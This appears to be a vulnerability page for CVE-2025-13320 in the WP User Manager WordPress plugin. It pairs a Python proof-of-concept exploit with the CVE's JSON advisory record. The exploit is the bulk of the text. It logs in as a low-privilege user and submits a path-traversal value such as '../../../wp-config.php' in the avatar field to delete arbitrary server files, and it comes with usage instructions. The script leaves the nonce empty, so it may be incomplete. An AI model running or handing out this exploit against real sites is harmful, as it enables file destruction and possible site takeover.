CVE-2025-13320

import requests import sys # CVE-2025-13320 PoC - WP User Manager Arbitrary File Deletion # Target: WordPress site with WP User Manager plugin <= 2.9.12 # Authentication required: Subscriber-level or higher # Prerequisite: Custom avatar setting must be enabled def delete_arbitrary_file(target_url, username, password, file_to_delete): """ Exploit for CVE-2025-13320: Arbitrary File Deletion in WP User Manager Args: target_url: Base URL of the WordPress site username: Valid user account (subscriber level minimum) password: Password for the account file_to_delete: Absolute path or relative path of file to delete """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Update profile with malicious avatar path # Using path traversal to delete arbitrary files profile_url = f"{target_url}/wp-admin/profile.php" # Construct malicious payload using current_user_avatar parameter # Path traversal: ../../../wp-config.php or similar malicious_path = "../../../" + file_to_delete.lstrip("/") profile_data = { 'first_name': 'Test', 'last_name': 'User', 'nickname': username, 'display_name': username, 'email': '[email protected]', 'url': '', 'action': 'update', 'nonce': '', # Need to fetch valid nonce 'current_user_avatar': malicious_path } response = session.post(profile_url, data=profile_data) if response.status_code == 200: print(f"[+] File deletion request sent: {file_to_delete}") print("[!] Verify file deletion manually") return True else: print("[-] Request failed") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <file_to_delete>") print(f"Example: python {sys.argv[0]} http://example.com admin password ../../../wp-config.php") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] file_path = sys.argv[4] delete_arbitrary_file(target, user, pwd, file_path)

{"cve": {"id": "CVE-2025-13320", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:41.147", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP User Manager plugin for WordPress is vulnerable to Arbitrary File Deletion in all versions up to, and including, 2.9.12. This is due to insufficient validation of user-supplied file paths in the profile update functionality combined with improper handling of array inputs by PHP's filter_input() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server via the 'current_user_avatar' parameter in a two-stage attack which can make remote code execution possible. This only affects sites with the custom avatar setting enabled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L75", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/tags/2.9.12/includes/forms/trait-wpum-account.php#L86", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L70", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L75", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-user-manager/trunk/includes/forms/trait-wpum-account.php#L86", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3420956/wp-user-manager/trunk/includes/forms/trait-wpum-account.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8304bf-bec2-4fcf-9fe2-46b626b3dae9?source=cve", "source": "[email protected]"}]}}